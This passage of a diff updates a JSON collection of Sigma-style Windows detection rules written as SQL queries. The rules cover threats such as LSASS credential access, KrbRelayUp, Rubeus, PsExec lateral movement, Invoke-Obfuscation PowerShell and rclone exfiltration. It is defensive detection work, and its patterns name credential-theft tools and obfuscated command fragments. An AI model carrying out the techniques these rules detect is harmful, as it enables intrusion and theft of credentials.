ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' 